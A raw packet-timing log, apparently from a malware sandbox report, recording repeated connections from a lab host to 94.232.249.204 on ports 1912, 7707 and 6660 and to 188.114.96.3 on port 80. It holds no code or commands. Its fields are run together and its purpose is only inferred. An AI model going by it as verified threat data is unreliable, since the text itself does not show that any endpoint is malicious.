                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274744987 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274765015 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274782896 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274840117 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274900913 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274909973 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274921894 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274940014 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.274950981 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275043011 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275053024 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275155067 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275171995 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275212049 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275260925 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275434971 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.275504112 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277865887 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277875900 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277920008 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277935982 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277985096 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.277997971 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278042078 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278050900 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278107882 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278116941 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278127909 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278136969 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278207064 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278214931 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278244019 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278283119 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278342962 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278352976 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278404951 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278414965 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278464079 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278474092 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.278480053 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280679941 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280689955 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280700922 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280710936 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280720949 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280729055 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280738115 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280746937 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280755997 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280764103 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280772924 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280781984 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280791044 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280801058 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280810118 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280817032 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280827045 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280834913 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280846119 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280854940 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280863047 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280873060 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280889034 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280899048 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280906916 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280916929 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280925035 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280934095 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280942917 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280951977 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.280960083 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.281061888 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282464981 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282871008 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282880068 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282888889 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282897949 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282917023 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282927036 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.282937050 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283041000 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283050060 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283102989 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283113003 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283152103 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.283162117 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284034014 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284044981 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284054041 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284063101 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284071922 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284080029 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284089088 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284096956 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284106016 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284115076 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284123898 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284132957 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284142017 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284151077 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284159899 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284168959 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284177065 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284185886 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284194946 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.284204006 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.298108101 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.303062916 CEST8049805188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.303124905 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.303209066 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.308689117 CEST8049805188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.308731079 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.316088915 CEST8049805188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.325285912 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.954885006 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.959711075 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:54.964543104 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.139020920 CEST8049805188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.139569044 CEST8049805188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.139719963 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.142499924 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.142689943 CEST4980580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.144263029 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.149116993 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.253380060 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.258301020 CEST8049806188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.258519888 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.258519888 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.263664961 CEST8049806188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.263797998 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.272844076 CEST8049806188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.327533007 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.328114033 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.334268093 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.512284040 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.513329029 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.518147945 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.696450949 CEST19124977994.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:55.744040966 CEST497791912192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.015944004 CEST8049806188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.016248941 CEST8049806188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.016294956 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.019768953 CEST4980680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.128056049 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.132956028 CEST8049807188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.133023024 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.133136988 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.137964964 CEST8049807188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.138015985 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.139199018 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.142939091 CEST8049807188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.207185030 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.267985106 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.346257925 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.853563070 CEST8049807188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.853586912 CEST8049807188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.853892088 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.859708071 CEST4980780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.972417116 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.977572918 CEST8049808188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.977950096 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.977998018 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.983828068 CEST8049808188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.983895063 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:56.989963055 CEST8049808188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.796525002 CEST8049808188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.797216892 CEST8049808188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.797262907 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.799808979 CEST4980880192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.909452915 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.914349079 CEST8049810188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.914410114 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.914474010 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.919260025 CEST8049810188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.919308901 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:57.924091101 CEST8049810188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.058420897 CEST498016660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.058830976 CEST498116660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.065737009 CEST66604980194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.066190958 CEST66604981194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.066248894 CEST498116660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.066653967 CEST498116660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.074075937 CEST66604981194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.632778883 CEST8049810188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.632842064 CEST8049810188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.633054018 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.642014980 CEST4981080192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.753261089 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.758173943 CEST8049812188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.758425951 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.758425951 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.763427019 CEST8049812188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.764070988 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.769011974 CEST8049812188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.968904018 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.969825029 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.973805904 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.973989964 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.974589109 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.974874973 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.974889040 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.981513023 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:58.981558084 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.492866993 CEST8049812188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.493633032 CEST8049812188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.493789911 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.497051001 CEST4981280192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.596851110 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.602827072 CEST8049814188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.602910042 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.602953911 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.607933044 CEST8049814188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.607975006 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.612845898 CEST8049814188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.622977972 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.623431921 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.629252911 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.737649918 CEST66604981194.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:27:59.737711906 CEST498116660192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.546161890 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.551698923 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.551774025 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.556701899 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.874397993 CEST77074981394.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:00.874692917 CEST498137707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.432348013 CEST8049814188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.442056894 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.446180105 CEST8049814188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.446268082 CEST4981480192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.550153017 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.557929993 CEST8049815188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.558139086 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.558139086 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.565731049 CEST8049815188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.565984011 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.572859049 CEST8049815188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.896436930 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.901948929 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.902004957 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:01.907183886 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.220319986 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.274036884 CEST8049815188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.275706053 CEST8049815188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.275755882 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.277806997 CEST4981580192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.309977055 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.362531900 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.394093037 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.399324894 CEST8049816188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.399386883 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.399445057 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.404601097 CEST8049816188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.404653072 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.410181046 CEST8049816188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.419677973 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.424485922 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.424534082 CEST497977707192.168.2.494.232.249.204
                                                                                                                                                                                                                                Jul 6, 2024 13:28:02.430684090 CEST77074979794.232.249.204192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.112416029 CEST8049816188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.115396023 CEST8049816188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.117763996 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.154722929 CEST4981680192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.268754005 CEST4981780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.273674965 CEST8049817188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.273937941 CEST4981780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.274019957 CEST4981780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.278862953 CEST8049817188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.278930902 CEST4981780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.288068056 CEST8049817188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.977922916 CEST8049817188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.978369951 CEST8049817188.114.96.3192.168.2.4
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.978420019 CEST4981780192.168.2.4188.114.96.3
                                                                                                                                                                                                                                Jul 6, 2024 13:28:03.981595993 CEST4981780192.168.2.4188.114.96.3
